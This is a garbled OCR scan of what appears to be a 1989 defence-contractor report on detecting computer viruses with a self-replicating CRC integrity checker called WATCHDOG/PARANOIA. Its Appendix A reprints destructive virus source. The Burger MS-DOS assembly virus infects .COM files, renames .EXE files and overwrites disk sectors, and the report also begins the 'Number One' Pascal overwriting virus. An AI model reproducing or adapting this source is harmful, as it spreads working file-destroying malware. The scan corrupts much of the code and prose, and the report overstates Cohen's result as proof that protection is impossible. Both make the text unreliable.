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TASK  OBJECTIVES 

"•the  objectives  of- Task  DI-MISC-80048/'JFront-End  Anti-Viral  De¬ 
tection  Mechanism  Using  Replicating/Self-Replicating  Software, 
are  threefold: 

1.  Research  viral  mechanisms,  anti-viral  procedures,  and 
self-replicating  software  mechanisms  for  use  as  security 
products  in  MS-DOS  and  UNIX  environments  on  PCs  and  Minis. 

2.  Evaluate  the  applicability  of  said  mechanisms  to  protect 
and/or  identify  and/or  detect  computer  virus  intrusion  and 
corruption  within  said  systems. 

3.  Begin  experimentation  with  a  replicating/self-replicating 
software  product  to  be  used  to  secure  SDIO  operating  sys¬ 
tems,  libraries,  and  archives. 
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B.  TECHNICAL  PROBLEMS'. 

-V' 

1.  Bugs  in  AT&T  UNIX  system  5  version  3  ( HCL  America  Magnix)- 
CSH  supports  job  monitoring  while  KSH  does  not.  The  dis¬ 
assembler  incorrectly  disassembles  an  instruction.  The 
wrong  owner/group  were  assigned  to  some  files  by  the  sys¬ 
tem.  The  RUNACCT,  started  by  the  CRON  table,  would  catch 
in  an  infinite  loop  on  startup  of  system.  Using  STTY  38. 
400  would  hang  up  the  line  even  in  single-user  mode. 

2.  The  use  of  a  WORM  program  (a  self-contained  self-replicat- 
ing  software  mechanism)  for  the  Watchdog/Paranoia  concept 
due  to  architectural  limitations  with  regard  to  memory, 
memory  addresses,  and  logical  memory  segments. 

Prevention  of  viruses  was  ruled  out  due  to  the  mathematic¬ 
al  computations  of  Dr.  Fred  Cohen.  He  proved  conclusively 
that  it  is  impossible  to  protect  against  computer  viruses. 

4.  ’Due  to  time  and  resource  limitations,  ACC,  Inc.  used  a  pub¬ 

licly  known  CRC-32  algorithm.  In  future,  a  less-public 
CRC  algorithm  will  be  used. 

5.  "Watchdog/Paranoia  slows  down  an  MS-DOS-based  PC  appreci¬ 

ably;  and  a  UNIX  machine,  somewhat.  Faster,  optimized  al¬ 
gorithms  need  to  be  researched., 

6.  'Due  to  the  impossibility  of  using  existing  appropriate 

technologies  for  detecting  a  well-written  WORM  or  Trojan 
Horse  program,  these  programs  were  omitted  from  the  proof 
of  concept.  Future  considerations  will  address  these  type 
of  programs  directly  and  separately . ( ,t‘ 
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C.  GENERAL  METHODOLOGY: 

ACC,  Inc.  used  the  following  definitions  in  its  research: 

1.  Computer  Virus:  A  set  of  instructions,  programmatic  or 

otherwise,  that  propagate  themselves  through  computer  sys¬ 
tems  and/or  networks,  deliberately  set  to  do  things  un¬ 
wanted  by  the  legitimate  owners  of  those  systems.  A  virus 
must  attach  itself  to  executable  code  in  order  to  function. 

2.  WORM:  A  self-contained,  free-running  computer  program 
which  relocates  in  memory. 

3.  Trojan  Horse:  A  program  that  does  other  than  what  it  was 
intended  to  do . 

4.  Prevention:  Stop  the  initial  and  subsequent  attempts  to 
infect  a  system.  Not  keyed  to  any  particular  infection. 

5.  Identification:  Indicates  specific  infections. 

6.  Detection:  Monitoring  change  to  the  characteristics  of 
any  executable  component.  Detection  is  not  keyed  to  any 
particular  infection. 

Dr.  Fred  Cohn  has  proven  mathematically  that  it  is  impossible  to 
prevent  a  computer  virus.  Pamela  Kane  of  Dr.  Panda  Systems  has 
proven  that  it  is  impossible  to  know  or  identify  all  code  that  can 
make  up  a  computer  virus.  And,  Steven  J.  Rose  of  Deloitte  Haskins 
and  Sells  has  stated,  "The  best  protection  would  be  to  detect  the 
presence  of  a  virus  before  it  could  do  harm."  Therefore,  ACC, 
Inc.  chose  to  detect  the  modification  of  executable  code  by  compu¬ 
ter  viruses  and  our  research  followed  that  premise. 

BBS  Text:  ACC,  Inc.  monitored  hacker  and  public  domain  bulletin 
board  services  for  information  on  computer  viruses  and  how  they 
function.  A  sample  is  included  in  Appendix  A.  This  research  pro¬ 
vided  us  with  a  number  of  computer  viruses  for  IBM,  Commodore, 
and  Apple  PCs,  and  a  WORM  program  for  VAX/VMS  in  ADA.  Especially 
informative  was  the  VIRUS-L  conference  on  BITNET. 

Academic  Research:  Research  includes  academic  papers  (Fred  Cohen, 
Ken  Thompson,  Gene  Spafford,  Ray  Glatz,  etc.),  commercial  magazine 
and  newspaper  articles,  trade  magazine  articles,  books,  and  pro¬ 
fessional-type  hacker  magazines.  A  short  bibliography  at  the  end 
of  this  report  will  show  the  types  of  sources  used. 

RE-APPLICATION  OF  PROVEN  TECHNOLOGY 

Self-replicatory  technology  research  began  in  the  1960 's  as  a  game 
in  Bell  Laboratories  called  Core  Wars.  Opposing  WORM  programs 
would  replicate  themselves  as  quickly  as  possible,  while  overwrit¬ 
ing  their  opponents.  The  program  with  the  greatest  number  of 
copies  was  the  winner.  The  WORM  programs  remained  a  game. 
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In  the  late  1970's  and  early  1980's,  further  research  into  self- 
replicatory  mechanisms  was  performed  at  the  Xerox  Palo  Alto  Re¬ 
search  Center.  Most  of  this  work  is  proprietary.  Research  tailed 
off  as  experimenters  had  difficulty  finding  applications  for  the 
self-replicatory  mechanism. 

The  NCR  100  series  system  operating  system  utilized  a  functioning 
self-replicatory  mechanism  to  automatically  upgrade  from  early 
operating  system  versions  to  later  ones.  This  use  of  a  self- 
replicatory  mechanism  eliminated  a  thankless  task  for  system  ad¬ 
ministrators  as  all  storage  devices  bought  on-line  eventually  up¬ 
graded  themselves . 

In  the  mid-1980's,  Dr.  Fred  Cohen  used  a  virus-oriented  mechanism 
as  a  compression  method  to  better  utilize  storage  space.  The  vir¬ 
us,  in  pseudocode,  is  written  like  this: 

program  compression-virus : = 

{01234567; 

subroutine  inf ect-executable : = 

{loop:  f  ile=get  random-executable-file ; 
if  f irst-line-of-f ile=01234567  then 
then  goto  loop; 
compress  file; 

prepend  compression-virus  to  file; 

i 

main-program := 

{if  ask-permission  then  inf ect-executable ; 
uncompress  the-rest-of-this-f ile  into  tmpfile; 
run  timpfile;}1 


(Computers  and  Security,  Vol.  8,  No.  4,  June  1989,  p.  326) 
His  concept,  though  it  worked,  proved  slow.  He  is  currently  work¬ 
ing  on  a  similar  mechanism  for  encryption  of  files. 

In  1989,  there  were  unconfirmed  reports  that  the  communications 
package  for  the  PRODIGY  bulletin  board  service  would  upgrade  a 
user's  package  if  he  was  using  an  earlier  version.  Frightening 
for  the  user,  but  a  useful  tool.  Finally,  hackers  are  exploring 
the  possibilities  of  self-replicatory  mechanisms.  "One,  whose 
handle  is  Bill  McTuesday,  says,  'They  can  clean  up  your  computer 
and  they  can  be  used  as  a  hacking  tool.  They  provide  a  good  way 
of  investigating  closed  systems...  They  will  also  defend  against 
invading  viruses...'"  (Mondo  2000,  Fall  #7,  1989,  p.  50)  Research 
into  potentially  self-replicating  software  mechanisms  has  potential. 
ACC,  Inc.  chose  to  reapply  this  technology  towards  creating  a 
tamper-proof,  free-running  security  system  with  NO  operator  inter¬ 
face  . 

ACC,  Inc.  then  performed  a  risks  analysis  of  potential  threats. 
Since  it  is  impossible,  using  existing  technologies,  to  detect  a 
well-written  WORM  or  trojan  horse  program,  we  concentrated  on  com¬ 
puter  viruses  and  code  corruption.  Worm  and  trojan  horse  programs 
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will  be  addressed  in  depth  in  Phase  II.  Since  it  is  impossible 
to  prevent  a  viral  occurrence,  either  through  transferable  storage 
media,  remote  access,  or  keyboard  input,  detection  of  corruption 
was  deemed  the  most  effective  way  to  bound  any  potential  damage 
caused  by  corruption.  The  research  then  moved  to  known  virus  code 
to  study  the  attaching,  executing,  and  replicatory  mechanism  of 
these  viruses.  For  security  reasons,  no  code  is  included.  Anyone 
who  needs  to  see  a  sample  may  contact  Mr.  Richard  Lenning  at  (205) 
895-4170. 

Lastly,  ACC,  Inc.  began  to  program  the  Watchdog/Paranoia  programs, 
our  replicatory  executable  code  security  mechanism. 


5 


D.  TECHNICAL  RESULTS 

WATCHDOG/PARANOIA 

WATCHDOG  is  a  replicatory  software  mechanism  for  protect¬ 
ing  executable  code  in  a  computing  system.  PARANOIA  is  the  code 
attached  to  the  executable  code  within  a  computing  system.  WATCH¬ 
DOG/PARANOIA  validates  the  integrity  of  executable  code  and  them¬ 
selves  before  allowing  any  program  to  execute.  This  self-running, 
replicating  mechanism  with  its  anti-tampering  feature  (self/cross 
validation)  disallows  operator  interference  with  its  functioning. 
It  was  successfully  demonstrated  on  October  5,  1989,  at  the  SDC, 
Huntsville,  Alabama. 


PAR . = PARANOIA 


1.  Note  the  multiple  copies  of  paranoia 


WATCHDOG  is  the  main  program  which  scans  all  executable 
files  within  a  system  and  validates  whether  or  not  Paranoia  is  at¬ 
tached.  If  not,  WATCHDOG  will  attach  PARANOIA  to  the  new  code 
segments.  PARANOIA  is  replicated  by  WATCHDOG  to  each  executable 
code  segment.  WATCHDOG  validates  the  integrity  of  PARANOIA  and 
is,  in  turn,  validated. 

Validation  is  achieved  through  the  use  of  an  integrated 
CRC-32/Checksum  calculated  on  a  known  good  copy  of  the  executable 
code.  This  value  is  stored  with  PARANOIA  attached  to  the  execut¬ 
able  code.  Every  time  the  code  segments  (schell  script/library) 
or  programs  are  to  be  executed,  PARANOIA  recalculates  and  validates 
the  CRC-3 2/Checksum  and  compares  it  with  the  original  value.  If 
the  validation  is  true,  it  allows  the  execution  of  the  program 
segment.  If  the  validation  is  false,  PARANOIA  sends  E-Mail  on¬ 
site  and  off-site  to  warn  of  possible  corruption/infection. 
WATCHDOG/PARANOIA  can  also  be  programmed  to  lock  up  the  system, 
or,  disallow  execution  of  the  offending  program  segment  while  al¬ 
lowing  validated  program  segments  to  continue  processing. 

The  anti-tamper ing  mechanism  depends  upon  communications  protocol 
between  WATCHDOG  and  PARANOIA.  Each  time  PARANOIA  is  executed,  it 
queries  WATCHDOG  to  validate  WATCHDOG  is  functioning.  If  WATCHDOG 
is  functional,  PARANOIA  continues.  If  WATCHDOG  is  non-functional 
in  any  way,  PARANOIA  will  send  E-Mail,  both  on-  and  off-site,  and 
prevent  the  execution  of  the  program  segment.  The  same  result 
occurs  if  PARANOIA  fails  its  validation  by  WATCHDOG.  Future  con¬ 
sideration  will  include  a  back-up  table  of  CRC/Checksum  values 
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within  WATCHDOG. 


For  security  reasons,  the  source  and  object  code  for 
Watchdog/Paranoia  has  not  been  included.  If  such  code  is  neces¬ 
sary  to  an  evaluation,  please  contact  Mr.  Richard  Lenning,  SDIO/ 
SDC  at  205-895-4170. 
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WATCHDOG 


1 

Start  I 

I - - 

Start 

Communications' 

|  Scanner 

A  BASIC  DESCRIPTION  OF  WATCHDOG/PARANOIA 


COMMON  MODULE  BREAKDOWN  IN  DOS/UNIX 
crc .  h 

header  file  for  crc.c 
defines : 

generatable ( ) 

this  initializes  the  table  used  by  generatecrc3 2 
generatecrc3 2 ( FILE  *) 

this  calculates  and  returns  the  negated  crc-32  value  for 
the  open  file  passed  in. 

crc .  c 

contains  the  code  for  the  above  functions. 


UNIX  module  breakdown 

crcset  (name) 

this  calculates  the  crc32  value  for  <name> .  If  it  is  not  cor¬ 
rect,  it  calculates  the  correct  value  and  appends  it  to  the 
executable  file, 
crcte st  ^name> 

this  calculates  the  crc32  value  for  ,iame  .  If  it  is  correct, 
it  returns  1  else  it  returns  0 
ldtest . tst 

temporary  file  generated  by  makepara  and  used  by  system  pro¬ 
gram  'Id'  used  to  generate  the  new  program, 
mail .  h 
defines 

mail ( to , text ) 

sends  'text'  using  system  file  mailx  to  'to'. 

mail .  c 

contains  code  for  mail, 
makepara  (name) 

this  program  uses  crc.c  and  mail.c  to  modify  executable  files 
reads  in  the  header  from  (name) 
checks  the  crc32  value,  exits  if  ok 
sends  mail  saying  that  it  is  correcting  the  file 
creates  ldtest. tst 
runs  system  program  'Id' 

calculates  the  new  crc32  value  and  appends  it  to  the  execut¬ 
able  file 
para .  c 

this  is  the  'header'  file  prepended  to  every  executable  file, 
verifies  that  the  crc32  value  at  the  end  of  the  file  is  correct 
if  not,  it  sends  mail  and  exits 
sees  if  watchdog  is  listening  by  doing  the  following: 

*  attempts  to  get  the  semaphore  used  by  watchdog 

*  sends  mail  and  exits  if  it  cannot 

*  attempts  to  increment  the  semaphore 

*  attempts  to  decrement  the  semaphore  by  2 

if  it  could  not,  it  prints  a  message  and  exits 
now  it  executes  the  attached  program 
semhead. h 

include  file  used  by  the  sem. . .  programs 
semclr 

creates  the  semaphore  and  set  it  to  0 
seminc 

increments  the  semaphore 
semset 

*  sets  the  semaphore  to  10 
semtest 

standalone  test  program 
semwai t 

waits  until  the  semaphore  is  incremented 
tl .  c 

simple  test  program 
t2  .  c 

simple  test  program 
virstart . s 

modified  assembly  language  start-up  code  for  ' c'  that  continues 
execution  of  the  main  program  after  the  header  completes 
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watch . c 

first  attempt  to  write  watch 
watch . sh 

this  shell  script  contains  2  infinite  loops  that  are  forked 
fork  1 

repeatedly  executes  'find'  to  find  all  files  that  are 
executable  and  executes  makepara  on  that  file 
fork  2 

executes  semclr  to  initialize  the  semaphore 
repeatedly  executes 
semwait 
seminc 
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MS-DOS  module  breakdown: 

cO . asm 

these  are  versions  of  the  borland  start-up  code  (tiny  model) 
modified  to  make  any  program  a  potential  virus, 
makepara  (name) 

this  program  uses  crc.c  to  modify  executable  files 
reads  in  the  header  from  <name>, 
checks  for  a  virus  header,  exits  if  ok 
adds  the  virus  header 

modifies  the  executable  header  to  jump  to  para.bin  first 
adds  para.bin  to  the  end  of  the  executable  file 

calculates  the  new  crc32  value  and  appends  it  to  the  executable 
file 

test3.c,  .exe 

this  is  the  program  the  tests  are  run  on. 
watch . h 

this  is  the  header  file  containing  the  description  of  the 
watchdog  header 
test2.c,  .exe,  .bin  (paranoia) 
this  is  the  exe-resident  code 

*  it  verifies  the  Checksum, 

*  it  verifies  that  watchdog  is  active, 
it  executes  the  normal  program  code. 

watch. c,  .exe 

this  is  the  memory  resident  code  that  verifies  that  no  writes 
are  done  to  any  .exe  files,  if  any  are  attempted,  it  first 
prompts  the  user  for  verification,  and  installs  paranoia  on 
any  files  that  are  executed. 
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E.  IMPORTANT  FINDINGS  AND  CONCLUSIONS 


1.  Self-Secure  Security  Mechanism:  A  non-operator  interrupt- 
able  self-replicatory  software  program  with  an  anti¬ 
tampering  mechanism  holds  great  promise  as  a  mechanism  for 
computing  system  security.  The  benefits  are  threefold: 

a.  Once  installed,  the  program  cannot  be  disabled  without 
a  full  system  shutdown. 

b.  The  program  logic  enforces  a  predefined  level  of  se¬ 
curity  regardless  of  the  laxness  of  security  inherent 
in  human-operated  and  installed  security. 

c.  There  is  no  operator  interface  with  the  program. 

2.  Detection: 

Detection  of  viruses  and  corruption  is  the  only  way  to  en¬ 
sure  that  an  affected  system  will  be  recovered  in  the 
shortest  amount  of  time. 

3.  Bounding  the  Damage:  It  is  the  detection  and  isolation  of 
corruption/intrusion,  such  that  all  affected  systems  are 
isolated  from  non-affected  systems.  Backup  systems  will 
be  brought  on-line  to  continue  the  processing  of  a  net¬ 
work  or  group  of  networks.  Future  considerations  will 
allow  for  isolation  of  affected  programs,  thus  allowing  a 
system  to  continue  processing  valid  programs. 

4.  Ease  of  Modification:  Even  with  inherent  operating  system 
security  measures  in  place,  it  was  quite  simple  to  modify 
executable  code  and  files  under  MS-DOS  and  UNIX. 

5.  Portability:  The  WATCHDOG/PARANOIA  concept  is  easily 
ported  to  other  operating  systems  and  architectures. 
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F.  IMPLICATIONS  FOR  FURTHER  RESEARCH 

I.  Continuation  of  UNIX  Effort  for  AT&T  system  5,  Version  3 

a.  Monitor  process  activity. 

1.  Log  of  process  activity 

2.  Investigate  suspicious  activity 

b.  Add  code  to  protect  shell  scripts,  archives,  and  li¬ 
braries  from  corruption. 

c.  Research  into  management  concerns  which  affect  systems 
administrators.  Enforcement  of  available  operating 
system  security. 

d.  Secure  log  of  activity. 

e.  Add  passwords  and  message  authentication  codes  to  mod¬ 
ify  mail  destinations. 

f.  Audit  trail  of  operational  states  for  recovery  in  a 
protected  mode. 

g.  Develop  a  shutdown  to  a  special  state  with  only  desig¬ 
nated  security  officer  override  if  any  operator  inter¬ 
face  is  necessary. 

h.  Define  requirements  for  a  test  utilizing  a  multi  user 
facility  (NTF  and  eventually  NTB) . 

NTF  =  Small  test  facility 
NTB  =  Full  SDI  computer  network 

i.  Investigate  the  use  of  shared  libraries  for  AT&T  5.3 
for  more  efficient  functioning  of  the  WATCHDOG/PARANOIA 
concept . 

j.  Study  methods  to  increase  product  functional  speed  at 
minimum  increase  in  overhead. 

k.  Eliminate  existing  points  of  vulnerability  (linker,  ar¬ 
chiver,  assembler,  debugger,  etc.) 

l.  WATCHDOG/PARANOIA  programmed  override  implementation/ 
enforcement  of  OS  security  at  maximum  level. 

m.  Develop  method  by  which  WATCHDOG/PARANOIA  does  not 
impede  realtime  executables. 

n.  Lockout  of  access  to  WATCHDOG/PARANOIA  code  and  any 
transfer  which  would  reduce  WATCHDOG/PARANOIA  security. 
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o.  Research  CRCs  and  Checksums  and  combinations  thereof 
to  optimize  security. 

p.  Develop  a  tighter  anti-tampering  mechanism  with  warning 
of  anomalies. 

2.  Expansion  of  the  Product  to  Multi-User  Minicomputer/Main¬ 
frame  Networked  Systems 

a.  Assure  compatibility  of  function  where  other  security 
systems  are  installed  (i.e.,  TOP  SECRET,  RACK-F). 

b.  Explore  PROM/firmware  board  for  self-installation. 

This  affects  every  machine/OS  uniquely. 

c.  Study  the  effect  of  parallel  processing  and  the  rela¬ 
tions  thereby  produced. 

d.  Develop  a  process  activity  scanner 

1.  Unusual  activity 

2.  Event-driven 

e.  Develop  a  functioning  message  authorization  code  (ID 
every  block) 

1.  External 

2 .  Internal 

f.  Port  to  real  time  ADA. 

g.  Implement  an  option  for  system  backup. 
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G.  SIGNIFICANT  HARDWARE  DEVELOPMENT 

Not  applicable.  The  Watchdog/Paranoia  concept  functions  on 
commercially  available  architectures. 
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APPENDIX  A 


Viruses:  Assembly,  Pascal,  Basic  &  Batch 


[ACC, INC  does  not  assume  responsibility  for  any  damages  that  may 
occur  when  compiling  viruses  depicted  in  this  explanation.  This 
Appendix  has  been  written  to  promote  knowledge  into  the  amazing 
universe  of  computer  viruses.] 

Viruses  can  be  written  in  practically  every  computer  language 
known  today,  although,  most  effective  viruses  have  been  written 
in  Assembly  Language. 

Many  uninitiated  in  the  methods  of  the  telecommunications 
hobbyist  think  that  viruses  cannot  be  written  in  Basic  due  to  its 
limited  command  universe.  This  is  untrue.  Basic  has  the 
capability  of  producing  very  effective  viruses  if  the  command  set 
is  properly  used.  Combining  assembly  and  basic  could  further 
enhance  the  effectiveness  of  a  virus. 

In  this  Appendix  we  will  examine  some  viruses  written  in  Assembly 
Language,  Pascal,  Basic  and  Batch  written  by  B.  Fix,  R.  Burger 
and  M.  Vallen  (members  of  the  Swiss  Crackers  Association)  which 
proved  to  be  very  interesting  to  the  phase  1  effort. 

Please  use  extreme  caution  when  assembling  these  virus  programs. 
Copy  the  result  to  a  separate  disk  when  you  compile. 

Virus  in  Assembly  Language 


Most  viruses  have  been  written  in  assembly  language  because  it 
has  the  unique  ability  to  bypass  operating  system  security.  Here 
is  an  example  of  a  virus  written  under  MS-DOS  2.1  which  can,  be 
compiled  in  the  later  versions.  ACC, Inc  has  included  remarks  so 
as  to  further  explain  the  parts  which  comprise  the  total  code 
development.  Programmers  may  wish  to  delete  those  segments  if 
desired . 


Program  Virus 
Version  1.1 
Writter  :  R.  Burger 
Created  1986 

This  is  a  demonstration  program  for  computer 
viruses.  It  has  the  ability  to  replace  itself, 
and  thereby  modify  other  programs.  Enjoy. 


Code  Segment 

Assume  CS:Code 
progr  equ  lOOh 
ORG  progr 

.****************************★**************★****** 

/ 

;  The  three  NOP's  serve  as  the  marker  byte  of  the 
;  virus  which  allow  it  to  identify  a  virus. 

•************************************************** 

t 

MAIN: 

nop 

nop 

nop 

Initialize  the  pointers 

****★*****★**★★★★**★★***■*****★★★★**★*★*★*******★** 
mov  ax, 00 

mov  es :[ pointer ], ax 
mov  es :[ counter ], ax 
mov  es :[ disks ], al 

************************************************** 

Get  the  selected  drive 

★************************************************* 

mov  ah,19h  ;drive? 

int  21h 

********^***************************************** 

Get  the  current  path  on  the  current  drive 
************************************************** 


mov 

cs :drive,al 

;save  drive 

mov 

ah, 47h 

;dir? 

mov 

dh ,  0 

add 

al ,  1 

mov 

dl ,  al 

;in  actual  drive 

lea 

si,cs:old  path 

! 

int 

21h 

★  ★★★'jlMlt**************************^***************** 

Get  the  number  of  drives  present.  If  only  one 
is  present,  the  pointer  for  the  search  order 
will  be  set  to  serach  order  +  6 


mov 

as , Oeh 

; how  many  disks 

mov 

dl,  0 

/ 

int 

21h 

mov 

al ,  01 

cmp 

al ,  01 

;one  drive 

jnz 

hups3 

mov 

al ,  06 

s3:  mov 

ah ,  0 

lea 

bx, search  order 

add  bx,ax 

add 

bx, OOOlh 

mov 

cs  rpointer , bx 

clc 

Carry  is  set,  if  no  more  .COM's  are  found. 

Then,  to  avoid  unnecessary  work,  .EXE  files  will 
be  renamed  to  .COM  files  and  infected. 

This  causes  the  error  message  "Program  to  large 
to  fit  memory"  when  starting  larger  infected 
EXE  programs . 


change_disk : 

jnc  no_name_change 

mov  ah,17h 

lea  dx , cs :maske_exe 

int  21h 

cmp  al,Qffh 

jnz  no_name_change 


; change  .EXE  to  .COM 


; .EXE  found? 


If  neither  .COM  nor  .EXE  is  found  then  sectors 
will  be  overwritten  depending  on  the  system  time 
in  milliseconds.  This  is  the  time  of  the  complete 
"infection"  of  a  storage  medium.  The  virus  can 
find  nothing  more  to  infect  and  starts  its  destruction 


mov 

ah , 2ch 

int 

21h 

mov 

bx , cs :pointer 

mov 

al , cs : [ bx ] 

mov 

bx,dx 

mov 

cx ,  2 

mov 

dh ,  0 

int 

26h 

;  read  system  clock 


;  write  crap  on  disk 
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Check  if  the  end  of  the  search  order  table  has  been 
reached  .  If  so,  end. 

*★★***★★*★*★*********★★★****★★★*★**★★*★*★*★★*?★★*★***★★ 


no_name_change : 

mov  bx,cs rpointer 
dec  bx 

mov  cs :pointer , bx 
mov  dl , cs : [ bx ] 
cmp  dl,0ffh 
jnz  hups2 
jmp  hops 

•**************************************************** 

t 

;  Get  new  drive  from  the  search  order  table  and  ;  select  it 
/ 

hups2 : 

mov  ah,0eh 

int  21h  jchange  disk 

•  dr************************************************** 

t 

;  Start  in  the  root  directory 

.a:************************************************** 

/ 

mov  ah,3bh  ; change  path 

lea  dx,path 
int  21h 

jmp  f indf irst_f ile 

*************************************************** 

t 

;  Starting  from  the  root,  search  for  the  first 
;  subdir.  First  convert  all  .EXE  files  to  .COM 
;  in  the  old  directory 

*************************************************** 


f ind_f irst_subdir : 
mov  ah,17h 
lea  dx , cs :maske_exe 
int  21h 
mov  ah,3bh 
lea  dx,path 
int  21h 
mov  ah,04eh 
mov  cx, 00010001b 
lea  dx,maske_dir 
int  21h 

jc  change_disk 
mov  bx ,CS : counter 


; change  .exe  to  .com 


;use  root  directory 


search  for  first  subdirectory 
dir  mask 
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INC , BX 
DEC  bx 

jz  use_next_subdir 

/ 

;  Search  for  the  next  subdirectory.  If  no  more 
;  directories  are  found,  the  drive  will  be  changed. 

t 

f ind_next_subdir : 

mov  ah,4fh  ;  search  for  next  subdir 

int  21h 

jc  change_disk 
dec  bx 

jnz  f ind_next_subdir 


Select  found  directory. 


use_next_subdir : 

mov  ah,2fh  ;get  dta  address 

int  21h 
add  bx,lch 

mov  es:[bx],'N'  ; address  of  name  in  dta 

inc  bx 

push  ds 

mov  ax.es 

mov  d:',ax 

mov  dx,bx 

mov  ah,3bh  ; change  path 

int  21h 
pop  ds 

mov  bx , cs : counter 
inc  bx 

mov  CS : counter , bx 


Find  first  .COM  file  in  the  current  directory. 
If  there  are  none,  search  the  next  directory. 


find_f irst_f ile : 

mov  ah,04eh  ;Search  for  first 

mov  cx, 00000001b  ;mask 

lea  dx,maske_com  ; 

int  21h  ; 

jc  f ind_f irst_subdir 

jmp  check_if_ill 
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*  *  * 


*  *  *  * 


****** 


;  If  program  is  ill  (infected),  then  search  for 
;  another  other. 

*************************************************** 

t 

f ind_next_f ile : 

mov  ah,4fh  jsearch  for  rext 

int  21h 

jc  f ind_f irst_subdir 

.************************************************* 

t 

;  Check  is  already  infected  by  virus. 
************************************************** 

check_if_ill : 

mov  ah,3dh  ;open  channel 

mov  al,02h  ; read/write 

mov  dx,9eh  ;address  of  name  in  dta 

int  21 

mov  bx,ax  ;save  channel 

mov  ah,3fh  ;  read  file 

mov  ch,buflen  ; 

mov  dx, buffer  ;write  in  buffer 

int  21h 

mov  ah,3eh  ;close  file  int  21h 


mov  ah,43h  ;write  enable 

mov  a 1,0 

mov  dx,9eh  ;address  of  name  in  dta 

int  21h 

mov  ah,43h 

mov  al,01h 

and  cx, 11111110b 

int  2 lh 
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m-k'k-kk-k'k'k'k'k'k-k'k'klc'k-k-k'k'k’k’k-k-klc'k'k'kk-kkkkjc'kfclc'kicfcit'kickiejck'kilcit'k'kit 

t 

;  Open  file  for  read/write  access. 

'k-k-kick'k’k'kitic-k-k’k-k'k'k-kic-k'k-k'k-k'k'kk-k’k-k-klc'k-k-k'k'k'k'k'k’k'k'k’k-k'k-k'k'k'k’k’k-k-k 

mov  ah,3dh  ; open  channel 

mov  al,02h  ; read/write 

mov  dx,9eh  jaddress  of  name  in  dta 

int  21h 

l 

;  Read  date  entry  of  program  and  save  for  future 
;  use . 

•**************************************************** 

/ 

mov  bx,ax  ; channel 

mov  ah,57h  ;get  date 

mov  al.O 
int  21h 

push  cx  ;save  date 

push  dx 

•  kk-k-k'kkk-k-k-kirir-k-k-kk'k-kicic'k'k'k'k-k'kk’k'k-k'k'kk'k’kic'kic'k-k'k-kic’kk-kic'kieicicir 
§ 

;  The  jump  located  at  address  OlOOh  of  the  program 
;  will  be  saved  for  further  use. 

***************************************************** 

mov  dx,cs: [conta]  ; save  old  jmp 

mov  cs : [ jmpbuf ] , dx 

mov  dx, cs : [ buf f er+1  ]  ; save  new  jump  lea  cx,cont-100h 

sub  dx,cx 

mov  cs: [conta] ,dx 

t 

;  The  virus  copies  itself  to  the  start  of  the  file. 

t 

mov  ah,57h  ;write  date 

mov  a 1,1 
pop  dx 

pop  cx  ; restore  date 

int  21h 

I 

;  Close  the  file. 

•  •kk'k’k-k-k-k'k'k’k’klcif-kieitkkitk’k’k’k’klckk'kkkkkk-kltk-kkk'kle-k-k'k’k-kitic-k-kkkk 
/ 

mov  ah,3eh  ;close  file 

int  21h 
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;  Restore  the  old  jump  address.  The  virus  saves  at 
;  address  "conta"  the  jump  which  was  at  the  start  of 
;  the  host  program. 

;  This  is  done  to  preserve  the  executability  of  the 
;  host  program  as  much  as  possible. 

;  After  saving  it  still  works  with  the  jump  address 

;  contained  in  the  virus.  The  jump  address  in  the 

;  virus  differs  from  the  jump  address  in  memory. 

9 

mov  dx , cs : [ jmpbuf ]  ; restore  old  jump 

mov  cs :[ conta ] ,dx 
hops :  nop 

call  use_old 

•  ■k-k-k-k-k-k'k-k’k-k'kic-k-k'k'k’k-kic-k'k'k'k-k'k'k'k'k'k'k'k-k-k'k-k'k'kic-k-k’k'k-k-k-k-k'k’k'k'k'k-k 

9 

;  Continue  with  the  host  program. 

9 

cont  db  0e9h  ;make  jump 

conta  dw  0 

mov  ah, 00 
int  21h 

.*★******★**************★******:***★*★**★**★**★****** 

9 

;  Reactivate  the  selected  drive  at  the  start  of 
;  the  program. 

t 

use_old: 

mov  ah,0eh  ;use  old  drive 

mov  dl,cs:drive 
int  21h 

9 

;  Reactivate  the  selected  path  at  the  start  of 
;  the  program. 


mov 

ah , 

3bh 

;use  old  drive 

lea 

dx , 

old_path-l 

;get  old  path 

and  backslash 

int 

21h 

ret 

search_order 

db 

0ffh,l, 0,2,3, 

Of  f  h ,  00  ,  of  f  h 

pointer 

dw 

0000 

;pointer  f. 

search  order 

counter 

dw 

0000 

; counter  f. 

nth.  search 

disks 

db 

0 

;number  of  disks 

maske_com 

db 

"*.com" ,00 

; search  for 

com  files 

maske  dir 

db 

,00 

; search  for 

dir '  s 
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maske_exe  db  of fh , 0 , 0 , 0 , 0 , 0 , 001 11111b 
db  0,"????????exe",0, 0,0,0 
db  0,"????????com",0 

maske__all  db  of  fh  ,  0 , 0 , 0 , 0 , 0 , 00111111b 

db  o, "???????????", 0,0, 0,0 

db  0, "????????com" ,0 


buffer  equ  OeOOh 
buflen  equ  230h 


jmpbuf  equ  buf f er+buf len 
path  db  "N" , 0 
drive  db  0 
back_slash  db  "N" 
old_path  db  32  dup  (?) 

code  ends 


;a  safe  place 

;  lenght  of  virus!!!! 

; careful 1 
;  if  changing !  !  !  ! 

;a  safe  place  for  jmp 
;first  place 
, ‘actual  drive 

;  old  path 


end  main 

[END  OF  THIS  VIRUS  PROGRAM] 


Virus  in  Pascal 


Pascal  is  another  high  level  language  that  can  produce  eye 
popping  computer  viruses.  Especially  when  the  usage  of  Turbo 
Pascal  is  involved.  The  virus  below  was  available  through 
various  bulletin  boards  for  a  while. 


( 


Number  One 


Please  handle  this  virus  with  care!!!!!!!!!!!  [Deadly  Demo] 

Number  One  infects  all  .COM  file's  (name  will  be  displayed). 
That  file  has  been  overwritten  with  Number  Ones ' s  program  code 
and  is  not  reconstructible !  If  all  files  are  infected  or  no 
•COM  files  are  found,  Number  one  gives  you  a  <Smile>. 

Files  may  be  protected  against  infections  of  Number  One  by 
setting  the  Read  ONLY  attribute. 
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Written  10.3.87  by  M.Vallen  (Turbo  Pascal  3.01A) 


> 


3 

(C-) 

Cu-O 

^1-3  '  Wont  allow  a  user  break,  enable  10  checke 

^  --  Constants  - 


Const 

Virus  Size  =  12027;  ^Number  One's  code  size} 

Warning  : String! 42]  ^Warning  message) 

=  'This  file  has  been  infected  ny  Number  One! 1 ; 

(  --  Type  declarations - 3 

Type 

DTARec  ^Record  £Data  area  for  file  search  ) 

DOSnext  : Array [ 1 .. 21 ]  of  Byte; 

Attr  :  Byte; 

Ftime , 

